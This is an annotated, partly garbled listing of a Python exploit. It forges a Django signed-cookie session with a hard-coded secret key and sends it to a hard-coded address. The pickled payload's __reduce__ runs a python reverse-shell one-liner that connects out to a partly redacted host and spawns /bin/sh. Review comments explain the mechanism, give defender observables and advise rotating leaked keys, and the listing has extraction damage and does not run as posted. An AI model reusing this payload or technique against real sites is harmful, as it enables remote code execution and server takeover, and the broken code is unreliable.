- import os, hashlib, sys, pickle
- import requests, subprocess
- from hmac import new as hmac
- from base64 import b64encode as b64
# Pickle gadget class. __reduce__ tells pickle how to rebuild an object; here
# it returns (os.system, (command,)), so any process that unpickles an
# instance calls os.system(command) instead of reconstructing data. This is
# why pickle must never be applied to bytes a client can supply.
- class ex(object):
- def __reduce__(self):
# The command is a `python -c` one-liner that connects a socket to a partly
# redacted address on port 2121, duplicates it over fds 0-2 and runs
# /bin/sh -i. What a defender can observe: a web worker spawning `python -c`
# or an interactive shell, or opening an unexpected outbound connection.
- return(os.system,('python -c\'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("167.99.X.X",2121));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'',))
# Wraps `payload` in a Django signed-cookie session value and sends it to the
# URL `add` as the `sessionid` cookie. `key` is the signing secret, so the
# cookie only verifies on a site whose SECRET_KEY the caller already knows;
# the signature protects nothing once that key has leaked.
# NOTE(review): the payload is only deserialized as pickle if the site uses
# the signed_cookies session backend with a pickle-based serializer --
# presumably the setup assumed here. Django's default JSONSerializer (default
# since 1.6) does not execute anything on load, and PickleSerializer was
# deprecated in Django 4.1 and removed in 5.0.
# NOTE(review): indentation was lost when this listing was extracted, so the
# nesting of the helpers below is inferred rather than shown.
- def send_django(key, add, payload):
# URL-safe base64 with the '=' padding stripped.
- def base64(s): #taken from django
- import base64
- return base64.urlsafe_b64encode(s).strip(b'=')
# Derives an HMAC key as SHA-1(salt + secret) and returns the raw HMAC-SHA1
# digest of `value` under that key.
- def salted_hmac(salt, value, secret): #taken from django
- key = hashlib.sha1((salt + secret).encode('utf-8')).digest()
# NOTE(review): the trailing `import time` on the next line was fused onto
# the return statement by the page extraction.
- return hmac(key, msg=value, digestmod=hashlib.sha1).digest()import time
- import baseconv #taken from django
# Current Unix time, base62-encoded, as bytes: the middle field of the cookie.
- timestamp = baseconv.base62.encode(str(int(time.time()))).encode()
- print(timestamp)
# The signed message is "<base64 payload>:<timestamp>".
- data = base64(payload)+b":"+timestamp
# The salt literal is the signed_cookies backend path with 'signer' appended.
- mac = base64(salted_hmac('django.contrib.sessions.backends.signed_cookiessigner', data, key)) #default
- salt by django
# Final cookie layout: payload:timestamp:signature.
- s = '{}:{}:{}'.format(base64(payload).decode(), timestamp.decode(),mac.decode())
- print(s)
# Sends one GET carrying the forged cookie and prints the response body.
- print(requests.get(add, cookies={'sessionid':s}).content)
# Driver: builds a dict holding an `ex` instance, produces a protocol-4
# pickle and passes it to send_django with a hard-coded key and URL.
# NOTE(review): the listing is not runnable as posted.
- last_viewed = {}
- last_viewed['last_viewed'] = ex()#"HACKED"
# A protocol-4 pickle starts with the bytes 0x80 0x04. On a site that uses
# JSON sessions, a sessionid whose first segment decodes to that header is
# anomalous and worth alerting on.
- p = pickle.dumps(a, protocol=4)
# NOTE(review): the first argument is presumably the target site's
# SECRET_KEY. A deployment whose key has been published like this should
# treat it as compromised: rotate the key, invalidate existing sessions, and
# make sure sessions are not deserialized with pickle.
- send_django("14wzd&o9dg1_ukfajt(6)bs5j*nhf2#_=xop^ry_y)5f8m0apq","http://104.250.105.109:19080/", p)